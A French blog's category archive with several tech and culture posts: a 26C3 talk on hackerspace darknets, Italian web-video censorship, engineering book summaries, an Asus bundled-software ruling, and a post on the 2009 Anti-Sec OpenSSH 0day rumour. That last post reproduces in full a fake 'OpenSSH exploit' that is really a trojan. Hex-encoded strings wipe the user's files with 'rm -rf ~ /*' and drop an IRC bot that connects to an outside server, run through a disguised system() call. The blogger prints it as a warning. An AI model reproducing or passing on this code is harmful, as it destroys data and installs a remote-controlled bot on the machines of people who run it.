Archive for the ‘Culture’ Category
eth0: 4 days of high-tech geekfest
Tuesday, May 25th, 2010France Wireless : wifi et liberté
Friday, February 5th, 201026C3: our darknet and its bright spots
Tuesday, January 19th, 2010our darknet and its bright spots
building connections for spaces and people
Building a private network to connect your neighbourhood. Why we feel common solutions are terrible on resources and what we think is better.
Get on board.
This talk will give you the opportunity to take a look at the shades of grey of interconnecting hackerspaces and people’s networks. Mc.Fly presents ChaosVPN, reborn in its darknet-ish approach and gaining momentum from established hackerspaces in the US and Europe with spaces like NYC Resistor, Pumping Station: One, Noisebridge and c-base. The Agora Network will be presented by Aestetix and Eric in covering the community and technical aspects and what to expect. Equinox will show you the white-ish side called dn42 - the old but nice lady that connects mostly german people and younger spaces like sublab and entropia.
Leveraging the efforts of the ChaosVPN network in the US is the Agora Network (Currently In Private Beta). By doing this we are not having to duplicate the efforts of every one involved we have settled on a standard platform utilising tincd. With hackerspaces popping up very rapidly and successfully in the US for the last 24 months we find this necessary. Agora is a mesh vpn service that serves to tie them all together on a common intranet. On the network people will be hosting machines for VMs, development, file hosting, PBX phone services, and a number of high performance clusters at the disposal of users which we are currently developing including those provided by node users. In the process several universities in the US have asked to join the network for several research opportunities not previously available to them.
dn42 is built with tunnels (OpenVPN, GRE, tinc, etc) and has BGP running over them - the same dynamic routing protocol the internet runs on, albeit with less networks in the routing table. We will shed some light on both the technical and social aspects of dn42. Our walk starts at technical foundations and heads over to what BGP allows us to do on a social level. We’ll also see how the flow of traffic can be engineered according to external constraints (think your plain asymmetric DSL at home), and last but not least we’ll discuss different cases of maliciousness and how they’re treated. While dn42 is our playground for testing and modelling all this stuff, most of it apples to the internet as well.
This talk is somewhere around entry to immediate level. You should roughly know what an IP subnet, a route and dynamic routing is.
Attached files
* (application/pdf - 731.4 KB)
Links
* Torrent of the video recording for this event in MPEG-4
* Video recording for this event in MPEG-4
* dn42
Berlusconi censure les WebTv - Débats politiques sur LePost.fr
Monday, January 18th, 2010Un avant goût de ce qui nous attend en France avec la future loi Loppsi, Berlusconi a fait passer dans la loi l’obligation d’une autorisation préalable pour diffuser de la vidéo sur le web, comme pour une chaîne de télévision hertzienne…avec un gros mensonge à la clé pour justifier son geste…la mise en application dans le droit italien d’une directive européenne…si çà c’est pas de la censure…
La vidéo en ligne en Italie, c’est fini. Désormais, il faudra obtenir une autorisation préalable, sous forme de licence, auprès du ministère des communications Italien.
L’opposition locale a eu beau s’opposer de toutes ses forces, le gouvernement de Berlusconi, connu pour son intégrité et son respect du droit, s’est contenté de dire qu’il ne faisait qu’appliquer une directive européenne sur le placement de produit. On imagine la tête de Margot Wallström, la commissaire Européenne chargé de la communication, également vice présidente de la Commission Européenne, d’origine Suédoise, connue pour avoir une toute autre vision de la liberté d’expression.
La similarité des situations médiatiques Française et Italienne laisse présager qu’une telle loi arrivera tôt ou tard en France, probablement, comme cela a déjà été évoqué par de nombreux politiciens, par le biais d’un contrôle du CSA sur la vidéo sur internet.
via Berlusconi censure les WebTv - Débats politiques sur LePost.fr.
Livre => Modélisation et calcul des milieux continus / Virtual testing and predictive modeling : for fatigue and fracture mechanics allowables / Computational fluid dynamics : principles and applications (2nd ed.)
Monday, January 18th, 2010Auteur : LE TALLEC P.
Titre : Modélisation et calcul des milieux continus
Editeur : Editions de l’Ecole Polytechnique
Année d’édition : 2009
Résumé :
L’ouvrage est une introduction à la mécanique des milieux continus tridimensionnels. Quatre aspects sont plus particulièrement considérés : la modélisation macroscopique des milieux continus et de leur mouvement, en y décrivant les déformations et en rappelant les lois de conservation que doit respecter tout mouvement ; la description des efforts qui génèrent le mouvement des milieux continus, avec l’introduction de la notion de tenseur de contraintes et l’écriture des équations globales qui les régissent ; l’introduction à l’échelle microscopique des comportements élémentaires qui permet de compléter la modélisation en introduisant les relations de comportement traduisant le lien local entre déformations et efforts ; la résolution de problèmes d’équilibre élastique. Cette étape de résolution de problèmes globaux utilise le principe des puissances virtuelles pour écrire, analyser et résoudre les problèmes posés, et pour en valider les solutions. Elle permet d’aborder de nombreuses situations pratiques et de sensibiliser les étudiants aux problèmes de distribution d’efforts, de discontinuités de solutions, d’incompatibilité de déformations, et d’instabilités géométriques.
Table des matières :
Mouvements et efforts
Le milieu continu ; Les déformations du milieu continu ; Déformations linéarisées et taux de déformation ; Lois de conservation ; Modélisation des efforts intérieurs ; Equations du mouvement ; Principe des puissances virtuelles.
Comportements et solutions d’équilibre
Description microscopique d’un milieu continu ; Le modèle élastique : approche microscopique ; Le modèle élastique : approche thermodynamique ; Le modèle élastique : les métaux ; Le modèle élastique : approche macroscopique ; Les problèmes de structures en élasticité ; Les problèmes élastiques en petites transformations ; Approches variationnelles en petites perturbations.
Annexes
Rappel des principales notations ; Calcul tensoriel ; Calcul différentiel ; Expressions explicites des équations de la dynamique ; Compléments de physique statistique.
Auteur : FARAHMAND B.
Titre : Virtual testing and predictive modeling : for fatigue and fracture mechanics allowables
Editeur : Springer
Année d’édition : 2009
Résumé :
Virtual testing and predictive modeling : for fatigue and fracture mechanics allowables provides an overview of cost and time efficient methods in generating the fatigue and fracture data of industrial structural parts. Readers will find a systematic introduction to virtual testing to generate fatigue and fracture allowables through two useful techniques : the conventional continuum mechanics approach, and the utilization of multiscale modeling and simulation techniques to predict materials’ properties.The virtual testing continuum approach already plays a crucial role in the life assessment of important manufactured structural parts in the aerospace, automotive, aircraft and defense industries when data is inaccessible to engineers.
Table of contents :
Bahram Farahmand .- Virtual Testing and Its Application in Aerospace Structural Parts ; R. Jones, D. Peng .- Tools for Assessing the Damage Tolerance of Primary Structural Components ; Spandan Maiti .- Cohesive Technology Applied to the Modeling and Simulation of Fatigue Failure ; Chris A. Rodopoulos .- Fatigue Damage Map as a Virtual Tool for Fatigue Damage Tolerance ; K.M. Nikbin .- Predicting Creep and Creep/Fatigue Crack Initiation and Growth for Virtual Testing and Life Assessment of Components ; Frank Abdi, J. Surdenas, Nasir Munir, Jerry Housner, Raju Keshavanarayana .- Computational Approach Toward Advanced Composite Material Qualification and Structural Certification ; G.C. Sih .- Modeling of Multiscale Fatigue Crack Growth : Nano/Micro and Micro/Macro Transitions ; Gregory M. Odegard .- Multiscale Modeling of Nanocomposite Materials ; Michael Doyle .- Predictive Modeling .- R.C. Picu .- Multiscale Approach to Predicting the Mechanical Behavior of Polymeric Melts ; G. Labeas .- Prediction of Damage Propagation and Failure of Composite Structures (Without Testing) ; Niranjan A. Malvadkar, Michael A. Ulizio, Jill Lowman, Melik C. Demirel .- Functional Nanostructured Polymer–Metal Interfaces ; Reza S. Yassar, Hessam M.S. Ghassemi .- Advanced Experimental Techniques for Multiscale Modeling of Materials.
Auteur : BLAZEK J..
Titre : Computational fluid dynamics : principles and applications (2nd ed.)
Editeur : Elsevier
Année d’édition : 2005
Résumé :
The objective of the book is to provide university students with a solid foundation for understanding the numerical methods employed in today’s CFD and to familiarise them with modern CFD codes by hands-on experience. It is also intended for engineers and scientists starting to work in the field of CFD or for those who apply CFD codes. Due to the detailed index, the text can serve as a reference handbook too. Each chapter includes an extensive bibliography, which provides an excellent basis for further studies. The accompanying CD-ROM contains the sources of 1-D and 2-D Euler and Navier-Stokes flow solvers (structured and unstructured) as well as of grid generators. Provided are also tools for Von Neumann stability analysis of 1-D model equations. Finally, the CD-ROM includes the source code of a dedicated visualisation software with graphical user interface.
Table of contents :
Introduction ; Governing Equations ; Principles of Solution of the Governing Equations : Spatial and Temporal Discretisation ; Structured Finite Volume Schemes ; Unstructured Finite Volume Schemes ; Temporal Discretisation ; Turbulence Modelling ; Boundary Conditions ; Acceleration Techniques ; Consistency, Accuracy and Stability ; Principles of Grid Generation ; Description of the Source Codes.
Appendix :
Governing equations in differential form ; Quasilinear form of the Euler equations ; Mathematical character of the governing equations ; Navier-Stokes equations in rotating frame of reference ; Navier-Stokes equations formulated for moving grids ; Thin shear layer approximation ; Parabolised Navier-Stokes equations ; Axisymmetric form of the Navier-Stokes equations ; Convective flux Jacobian ; Viscous flux Jacobian ; Transformation from conservative to characteristic variables ; GMRES algorithm ; Tensor notation.
The Big Bang - Hack someone…or something - Anti-sec versus SSH …
Friday, December 4th, 2009The Big Bang - Hack someone…or something - Anti-sec versus SSH ….
En effet, une semaine dèjà, que cour la rumeur sur une éventuelle faille touchant SSH.
En réalité, Eric Romang, co-fondateur du site zataz, avait deja en Juin dernier mis en avant le fait d’une augmentation massive des scan SSH et de brutes forces. [Ici].
Un moi plus tard, un groupe de hacker nommé Anti-Sec, à annoncé un 0day touchant SSH. En effet, la société d’hébergement OVH a envoyé a tous ces clients un courrier electronique
d’information concernant cette éventuelle alerte. [Message d'OVH ici].
Voici les résultats montré par les logs de serveurs attaqué : ICI
Cette article pertinent concernant l’attaque, montre qu’un FAKE Sploit est de sortie … des petits plaisantins se sont amusé a réaliser un fakecode qui une fois compilé et lancé,
efface des éléments systèmes de la machine.
Oui mais voilà, Anti-Sec tape, et tape même fort. Ils auraient utilisé ce 0day a des fins d’hacktivisme… c’est le site imageshack qui s’est vue remplacé toutes ces images
par un message type image:
Un coup dur pour ce site d’hébergement d’image reconnu internationnalement. Voici d’ailleur leur première déclaration … [ICI].
C’est donc leur IDS qui a permis de corriger la faille rapidement. (Vrai…pas vrai ?)
Bref, une autre victime de cette attaque particulièrement efficace… voici d’ailleur d’autres logs très interessant sur l’attaque: [ICI].
Mais des hackers en cache d’autres… un FAKE de ce 0day circule actuellement sur des sites underground, et des cannaux IRC du même type,
le voici en intégrale, mais avant de vous lancer dans la compilation et l’éxécution de ce faux sploit, vous devez savoir que le shellcode une fois traduis donne ceci:
rm -rf ~ /* 2> /dev/null &
Autrement dit, vous n’avez plus qu’a formater ^^
/* 0pen0wn.c by anti-sec group
* ---------------------------
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";
char fbsd_shellcode[] =
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)
void usage(char *arg){
printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
printf(" Usage: %s -h -p port\n",arg);
printf(" Options:\n");
printf(" \t-h ip/host of target\n");
printf(" \t-p port\n");
printf(" \t-d username\n");
printf(" \t-B memory_limit 8/16/64\n\n\n");
}
#define FD 0x080518fc
#define BD 0x08082000
int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;
if (geteuid()) {
puts("need root for raw socket, etc...");
return 1;
}
if(argc < 3){
usage(argv[0]);
return 1;
}
printf("\n [+] 0wn0wn - by anti-sec group\n");
if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf(" [-] Resolving failed\n");
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(" [-] Connecting failed\n");
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,"w+");
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(" [-] connecting failed\n");
}
payload[sizeof(payload)-1] = '\0';
payload[sizeof(payload)-2] = '\0';
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v--- our cool bar that says: "r0000000t!!!" */
printf("\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
fremote("PS1='sh-3.2#' /bin/sh");
}
else
printf(" [-] failed to exploit target :-(\n");
close(sock);
return 0;
}
N’éxécutez donc surtout pas ce code … !! (Posté ici a but informatif, ne vous faites pas avoir … !)
Pour revenir au sujet, voilà que la team Anti-Sec semble une fois de plus avoir frappé. Après le moteur de crack Astalavista.box.sk, SSANZ et imageshack,
c’est au tour du site blackHat Forums de payé les pots cassés.
A l’heure ou j’écris cet article, l’accès au site ne mène qu’au visionnage d’une video particulièrement choquante (Scato…).
Asus condamné pour une vente forcée de Windows- Ecrans
Thursday, December 3rd, 2009Asus condamné pour une vente forcée de Windows
par Manuel Raynaud
tags : logiciel libre , justice , économie
CC Mr Conguito
Eric Magnien est doublement soulagé. Le tribunal de Lorient vient de lui donner une seconde fois raison dans le différend qui l’opposait à Asus. Le 27 mai 2008, il s’était offert un ordinateur portable mais, comme la loi le prévoit, ne souhaitait pas conserver Windows Vista vendu avec. Il préfère utiliser des logiciels libres.
Problème : quand il allume l’ordinateur, il lui est impossible de ne pas passer par la case « installation de Vista » et donc le contrat de licence Windows y afférant. C’en est trop : il prend contact avec Asus qui lui propose de faire le vide du disque dur mais « aux frais du client ». Autrement dit, c’est à lui de payer le transport. Le constructeur lui promet également un chèque de remboursement de 40 euros en échange du logiciel Vista.
Ces conditions ne lui conviennent pas. Il se rend devant le tribunal de proximité de Lorient qui lui donne raison une première fois le 27 août. Asus y est condamné à lui verser 205€ ainsi que 500€ pour les frais de justice. « Il ne peut être sérieusement contesté que les modalités de la vente liée mise en place par la société ASUS ont pour effet de contraindre de manière quasi directe le consommateur de conserver le système d’exploitation Windows de Microsoft », note alors le jugement.
Puis, une seconde fois le 12 novembre après qu’Asus ait fait appel du premier jugement. Et cette fois-ci, la condamnation est même un peu plus forte : 400€ à titre de dommages et intérêts et 250€ pour les frais engagés. Cette somme s’ajoute à la première condamnation. Au total, Eric Magnien a reçu un chèque de 1405,90€ comme le montre l’Association Francophone des Utilisateurs de Logiciels Libres (AFUL). Ironique puisqu’à l’origine, il n’en demandait pas tant, seulement 205€ soit l’équivalent des prix cumulés de Windows Vista Home Premium, d’Office One et de Nero 7.
Pour l’AFUL, qui milite contre ce système de ventes liées, cette somme résulte « de l’entêtement totalement déraisonnable du constructeur » et, renforcée par ce jugement, « appelle à la multiplication des demandes de remboursement auprès des constructeurs de la part de ceux qui n’ont pas besoin des licences imposées, notamment de la part des étudiants et enseignants qui bénéficient déjà de licences, gratuites ou non, pour ces mêmes logiciels ou pour d’autres ».
Spam-Une solution mais à quel prix :/
